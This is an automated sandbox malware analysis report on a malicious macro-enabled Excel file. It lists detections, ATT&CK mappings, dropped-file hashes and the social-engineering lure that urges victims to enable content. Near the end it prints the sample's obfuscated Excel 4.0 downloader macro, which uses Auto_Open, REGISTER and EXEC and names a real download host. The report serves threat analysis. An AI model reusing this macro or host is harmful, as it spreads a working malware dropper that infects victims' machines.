Loading ...

Play interactive tourEdit tour

Analysis Report Document_280325456.xlsm

Overview

General Information

Sample Name:Document_280325456.xlsm
Analysis ID:336351
MD5:c1bf94e62e9006b88957ff148ea99a4a
SHA1:96b65855460b4ef922a53527fb07a31c87f0743c
SHA256:4f753f04450557e02847d44c31b1f498b41a7eb7cb4cd60cd8c8d60a3e38f3a6

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Found Excel 4.0 Macro with suspicious formulas
Excel documents contains an embedded macro which executes code when the document is opened

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 648 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

barindex
Multi AV Scanner detection for submitted fileShow sources
Source: Document_280325456.xlsmVirustotal: Detection: 11%Perma Link

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37E9613F.pngJump to behavior

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 1 11 12 1 from the yellow bar above 13 14 1 @Once You have Enable Editing, please
Source: Screenshot number: 4Screenshot OCR: Enable Content 15 1 from the yellow bar above 16 CI 17 I " I WHY I CANNOTOPEN THIS DOCUMENT? 19
Source: Document image extraction number: 2Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 2Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? You are using iOS or Andro
Source: Document image extraction number: 8Screenshot OCR: Enable Editing from the yellow bar above @Once You have Enable Editing, please click Enable Conten
Source: Document image extraction number: 8Screenshot OCR: Enable Content from the yellow bar above WHYICANNOTOPEN THIS DOCUMENT? wYou are using IDS or Andr
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Document_280325456.xlsmInitial sample: EXEC
Source: workbook.xmlBinary string: " defaultThemeVersion="124226"/><bookViews><workbookView xWindow="240" yWindow="105" windowWidth="14805" windowHeight="8010"/></bookViews><sheets><sheet name="DocuSign" sheetId="7" r:id="rId1"/><sheet name="Sheet" sheetId="4" state="hidden" r:id="rId2"/><sheet name="Biola" sheetId="8" state="hidden" r:id="rId3"/></sheets><definedNames><definedName name="_xlnm.Auto_Open">Sheet!$A$100</definedName></definedNames><calcPr calcId="144525"/></workbook>
Source: classification engineClassification label: mal64.expl.evad.winXLSM@1/9@0/0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Document_280325456.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD95D.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: Document_280325456.xlsmVirustotal: Detection: 11%
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/media/image1.png
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/media/image3.png
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/media/image2.png
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: Document_280325456.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting11Path InterceptionPath InterceptionMasquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothJunk DataExploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Scripting11Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Document_280325456.xlsm12%VirustotalBrowse

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:31.0.0 Red Diamond
Analysis ID:336351
Start date:05.01.2021
Start time:21:15:02
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 11s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:Document_280325456.xlsm
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal64.expl.evad.winXLSM@1/9@0/0
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .xlsm
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\37E9613F.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 205 x 58, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):8301
Entropy (8bit):7.970711494690041
Encrypted:false
SSDEEP:192:BzNWXTPmjktA8BddiGGwjNHOQRud4JTTOFPY4:B8aoVT0QNuzWKPh
MD5:D8574C9CC4123EF67C8B600850BE52EE
SHA1:5547AC473B3523BA2410E04B75E37B1944EE0CCC
SHA-256:ADD8156BAA01E6A9DE10132E57A2E4659B1A8027A8850B8937E57D56A4FC204B
SHA-512:20D29AF016ED2115C210F4F21C65195F026AAEA14AA16E36FD705482CC31CD26AB78C4C7A344FD11D4E673742E458C2A104A392B28187F2ECCE988B0612DBACF
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.......:......IJ.....sRGB.........pHYs..........+.... .IDATx^..\....}.\6"Sp...g..9Ks..r..=r.U....Y..l.S.2...Q.'C............h}x........... ......\..N...z....._.|......III.666...~~~..6l.Q.J...\..m..g.h.SRR.\.p....'N...EEE...X9......c.&M...].n.g4..E..g...w...{..]..;w..I...y.m\...~..;.].3{~..qV.k..._....?..w/$GlI|..2. m,,,.-[.....sr.V1..g...on...........dl.'...'''[[[.R.......(..^...F.PT.Xq..Mnnn.3..M..g.......6.....pP"#F..P/S.L...W.^..o.r.....5H......111t....|9..3...`J..>...{..t~/F.b..h.P..]z..)......o..4n.F..e...0!!!......#""h.K..K.....g.......^..w.!.$.&...7n.].F.\\\.A....6lxjj.K/........g.....3g......f....:t..s..5.C4..+W.y...88..?.,Y. .^...8{.@VN.6....Kbch.=zt...7+T....v.z....P........VVV..."t.N......$..Jag.v.U...P[(_.I?.9.4i.G.$U..D......W.r...........!>|..#G...3..x.b......P....H!.Vj......u.2..*;..Z..c..._Ga....&L.......`.1.[.n].7..W_m..#8k...)U..L.....G..q.F.e>..s.......q....J....(.N.V...k..>m....=.).
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\52C00A34.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):557
Entropy (8bit):7.343009301479381
Encrypted:false
SSDEEP:12:6v/7aLMZ5I9TvSb5Lr6U7+uHK2yJtNJTNSB0qNMQCvGEvfvqVFsSq6ixPT3Zf:Ng8SdCU7+uqF20qNM1dvfSviNd
MD5:A516B6CB784827C6BDE58BC9D341C1BD
SHA1:9D602E7248E06FF639E6437A0A16EA7A4F9E6C73
SHA-256:EF8F7EDB6BA0B5ACEC64543A0AF1B133539FFD439F8324634C3F970112997074
SHA-512:C297A61DA1D7E7F247E14D188C425D43184139991B15A5F932403EE68C356B01879B90B7F96D55B0C9B02F6B9BFAF4E915191683126183E49E668B6049048D35
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8Oc.......l.9a._.X....@.`ddbc.]...........O..m7.r0|..."......?A.......w..;.N1u........_.[.\Y...BK=...F +.t.M~..oX..%....211o.q.P.".......y...../..l.r...4..Q]..h.....LL.d.......d....w.>{.e..k.7.9y.%.. .YpI...{.+Kv......./..\[...A....^.5c..O?.......G...VB..4HWY...9NU...?..S..$..1..6.U.....c... ....7..J. "M..5. ............_.......d.V.W.c.....Y.A..S....~.C.....q........t?..."n.....4......G_......Q..x..W.!L.a...3....MR.|.-P#P;..p._.......jUG....X........IEND.B`.
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B6E53CA5.png
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:PNG image data, 24 x 24, 8-bit/color RGB, non-interlaced
Category:dropped
Size (bytes):848
Entropy (8bit):7.595467031611744
Encrypted:false
SSDEEP:24:NLJZbn0jL5Q3H/hbqzej+0C3Yi6yyuq53q:JIjm3pQCLWYi67lc
MD5:02DB1068B56D3FD907241C2F3240F849
SHA1:58EC338C879DDBDF02265CBEFA9A2FB08C569D20
SHA-256:D58FF94F5BB5D49236C138DC109CE83E82879D0D44BE387B0EA3773D908DD25F
SHA-512:9057CE6FA62F83BB3F3EFAB2E5142ABC41190C08846B90492C37A51F07489F69EDA1D1CA6235C2C8510473E8EA443ECC5694E415AEAF3C7BD07F864212064678
Malicious:false
Reputation:moderate, very likely benign file
Preview: .PNG........IHDR.............o.......sRGB.........pHYs..........+......IDAT8O.T]H.Q..;3...?..fk.lR..R$.R.Pb.Q...B..OA..T$.hAD...J../..-h...fj..+....;s.vg.Zsw.=...{.w.s.w.@.....;..s...O........;.y.p........,...s1@ Ir.:... .>.LLa..b?h...l.6..U....1....r.....T..O.d.KSA...7.YS..a.(F@....xe.^.I..$h....PpJ...k%.....9..QQ....h..!H*................./....2..J2..HG....A....Q&...k...d..&..Xa.t..E....E..f2.d(..v.~.P.+.pik+;...xEU.g....._xfw...+...(..pQ.(..(.U./..)..@..?..........f.'...lx+@F...+....)..k.A2...r~B,....TZ..y..9...`..0....q....yY....Q.......A.....8j[.O9..t..&...g. I@ ..;..X!...9S.J5..'.xh...8I.~.+...mf.m.W.i..{...+>P...Rh...+..br^$. q.^.......(..._.j...$..Ar...MZm|...9..E..!U[S.fDx7<....Wd.......p..C......^MyI:...c.^..SI.mGj,.......!...h..$..;...........yD./..a...-j.^:.}..v....RQY*.^......IEND.B`.
C:\Users\user\AppData\Local\Temp\9FDE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26157
Entropy (8bit):7.557610528482013
Encrypted:false
SSDEEP:768:1nnlABP+wARgLfJ9gGOm7lVW+u7qk8nN8ZUq:Bnl0WwWgngGdefcKZt
MD5:A37098191951CA041AA34B0C0075B023
SHA1:AFAD14C7B12EEA825097FAFBA7A619BD8CAECFB4
SHA-256:16E00334E893B2E5D1C965A0BF64D64097A459BCFFC8CAAC8C3C703E960E9C00
SHA-512:97BFDDEC9D3A90BCD7E152059BB44D39008E0BDB59299821EB880921BE5C8BA46B69F00959843885AC65FB5D55EEF21A574A78335ACE2C35605FBA931E3D97AE
Malicious:false
Reputation:low
Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Wed Jan 6 04:15:42 2021, atime=Wed Jan 6 04:15:42 2021, length=12288, window=hide
Category:dropped
Size (bytes):867
Entropy (8bit):4.485963974010465
Encrypted:false
SSDEEP:12:85QICLgXg/XAlCPCHaXtB8XzB/gUaX+Wnicvb7jLbDtZ3YilMMEpxRljK8CTdJP8:857U/XTd6j25YefbDv3q+rNru/
MD5:25BD30BB83124FF36C7DAFD697E1DB3C
SHA1:81631A5F31DF3551239DF71D3174000915A2BFC7
SHA-256:1AC7FC4228EADF03B364F436F94B88FCF5A1E1E376129CF928E0CF0C97E525CA
SHA-512:EE5FDADC3457A2FBC408895582ECD7348FDEC536B4483C319B8C10BAF8BC12E50BEBFEB45A5BA07E05F5DEAC5B42919B90A08EECD7EC4DBF750CD9FE99C26AE1
Malicious:false
Reputation:low
Preview: L..................F...........7G..=+......=+.......0......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....&R.)..Desktop.d......QK.X&R.)*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Document_280325456.LNK
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Jan 6 04:15:42 2021, atime=Wed Jan 6 04:15:42 2021, length=26157, window=hide
Category:dropped
Size (bytes):2118
Entropy (8bit):4.542343333365082
Encrypted:false
SSDEEP:48:8Fm/XT0jFvMG5WCB+Z+Qh2Fm/XT0jFvMG5WCB+Z+Q/:8Fm/XojFL5js+Qh2Fm/XojFL5js+Q/
MD5:B666F7E5E296D535C2FE455C644BEEA8
SHA1:C5A2BDE8E84CA4B65CF409C0AEBA21FADE436654
SHA-256:8D74810AA5F0EFA9B5F115B8EBCA9330653666E22651603ACC4FDAE926A41B42
SHA-512:C8BDDD336EBB8507024A6F0B31C49F2C869646BAB25FAB24F4EF70E992F0DF67283DEF45BF618F0696A7A6F9684AE18A351802270AB01507C63D9EF385200A27
Malicious:false
Reputation:low
Preview: L..................F.... .......{..|h......=+......-f...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2.xf..&R.) .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................D.o.c.u.m.e.n.t._.2.8.0.3.2.5.4.5.6...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\061544\Users.user\Desktop\Document_280325456.xlsm.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.o.c.u.m.e.n.t._.2.8.0.3.2.5.4.5.6...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......061544..........D_....3N.
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):109
Entropy (8bit):4.741129595988925
Encrypted:false
SSDEEP:3:oyBVomxWqdsIyjo5S/IyjomxWqdsIyjov:dj/h0ySQ0/h0y
MD5:E7CBB7A6C94239A6230A55D1CCBCCCDE
SHA1:7827FAA76A624DA91B86731EABD82B301E5DB65E
SHA-256:6138F50323CC704F93184A93584CDC09555BE6B32A388FFFF975BBC365B6FF57
SHA-512:5A82957358F3EFE6C7395FB1858CCB80DA4A63C92790E1E41B7D86A2F01D8BE5C0D136515DB8F50CE4AE4B920555ACF0EF7173DFC6C58516899FAFCBCD61EA2D
Malicious:false
Reputation:low
Preview: Desktop.LNK=0..[misc]..Document_280325456.LNK=0..Document_280325456.LNK=0..[misc]..Document_280325456.LNK=0..
C:\Users\user\Desktop\20EE0000
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):26157
Entropy (8bit):7.557610528482013
Encrypted:false
SSDEEP:768:1nnlABP+wARgLfJ9gGOm7lVW+u7qk8nN8ZUq:Bnl0WwWgngGdefcKZt
MD5:A37098191951CA041AA34B0C0075B023
SHA1:AFAD14C7B12EEA825097FAFBA7A619BD8CAECFB4
SHA-256:16E00334E893B2E5D1C965A0BF64D64097A459BCFFC8CAAC8C3C703E960E9C00
SHA-512:97BFDDEC9D3A90BCD7E152059BB44D39008E0BDB59299821EB880921BE5C8BA46B69F00959843885AC65FB5D55EEF21A574A78335ACE2C35605FBA931E3D97AE
Malicious:false
Reputation:low
Preview: .U.n.0....?..........C....I?.&..an.0.........#.z.Bj.Fq8..XS=CD.]......I...Z.....*L.)a...m.......6.VT.e}J.;.({........G+....!..~9.}.....)c......I...wJ...z.].j...h)....N..~.....O........ Y...1>@Jd..?..\..m...WD0.W2!s...b.{......C.y;...'-`...{..........z...9...X.F.iJb..2..'..hNh....S.D^n....'9.~.I...Qt.*d...z.f.3..Ov.m7.......qL[.xf.;.).^DP..6rwv..cO.PQ.d.|x.x......F^.......{....}...qG8].k...u .I...........{g..cE.:...1.........PK..........!.................[Content_Types].xml ...(................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
C:\Users\user\Desktop\~$Document_280325456.xlsm
Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:data
Category:dropped
Size (bytes):330
Entropy (8bit):1.4377382811115937
Encrypted:false
SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
MD5:96114D75E30EBD26B572C1FC83D1D02E
SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
Malicious:true
Reputation:moderate, very likely benign file
Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:Microsoft Excel 2007+
Entropy (8bit):7.5570229813719845
TrID:
  • Excel Microsoft Office Open XML Format document (40004/1) 83.33%
  • ZIP compressed archive (8000/1) 16.67%
File name:Document_280325456.xlsm
File size:26232
MD5:c1bf94e62e9006b88957ff148ea99a4a
SHA1:96b65855460b4ef922a53527fb07a31c87f0743c
SHA256:4f753f04450557e02847d44c31b1f498b41a7eb7cb4cd60cd8c8d60a3e38f3a6
SHA512:74bc623ab19eb585790edb7093d028bf68eb9de99736b507ab3cabb0e83b09dcb12453b1bed2c0804835094012d908a6b5f42a69ba55494b04fe51bd561975e4
SSDEEP:768:AIflDaGcMARgtf+9jZOm7lsfW+u7DetR8g:fflD0MWw4jZd1fgRP
File Content Preview:PK..........!.................[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon

Icon Hash:e4e2aa8aa4bcbcac

Static OLE Info

General

Document Type:OpenXML
Number of OLE Files:1

OLE File "Document_280325456.xlsm"

Indicators

Has Summary Info:
Application Name:
Encrypted Document:
Contains Word Document Stream:
Contains Workbook/Book Stream:
Contains PowerPoint Document Stream:
Contains Visio Document Stream:
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:

Macro 4.0 Code

,,,,,,,,,,,,,,,,,,"=EXEC(AS41071&"" ""&AQ4875&HG9961)"=B100(),"=FORMULA.FILL(Biola!Q43&Biola!Q44&Biola!Q45&Biola!Q46&Biola!Q47&Biola!Q48,BB53)","=FORMULA.FILL(""INSENG"",HI18807)",=RETURN(A112),=B102(),=C102(),,"=FORMULA.FILL(Biola!R42&Biola!R43&Biola!R44&Biola!R45&Biola!R46&Biola!R47&Biola!R48&Biola!R49&Biola!R50&Biola!R51&Biola!R52&Biola!R53&Biola!R54&Biola!R55&Biola!R56&Biola!R57&Biola!R58&Biola!R59,HZ48004)","=FORMULA.FILL(Biola!E50,AN32726)",,=B104(),=C104(),"=REGISTER(BB53,HZ48004,HI18898,IK4106,,1,9)","=FORMULA.FILL(Biola!Q51&Biola!Q52&Biola!Q53&Biola!Q54&Biola!Q55&Biola!Q56,HI18898)","=FORMULA.FILL(""BCCJ"",IK16309)","=Niokaser(0,GT17028,AQ4875,0,0)",=B106(),=C106(),,"=FORMULA.FILL(Biola!H42&B115,GT17028)","=FORMULA.FILL(""Niokaser"",IK4106)","=REGISTER(HI18807,AN32726,IK16309,DI7875,,1,9)",=B108(),=C108(),"=Vuolasd(GT17028,AQ4875,1)","=FORMULA.FILL(Biola!H43,AQ4875)","=FORMULA.FILL(""Vuolasd"",DI7875)",,"=FORMULA.FILL(Biola!H52,AS41071)",=A104(),,=B111(),,=RUN(D99),"=FORMULA.FILL(Biola!H53,HG9961)",,,=C100(),,=HALT(),,,,,,,hiperdoscolchoes.com/demoimg.gif,,

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

System Behavior

General

Start time:21:15:40
Start date:05/01/2021
Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):false
Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:0x13fd70000
File size:27641504 bytes
MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high

Disassembly

Reset < >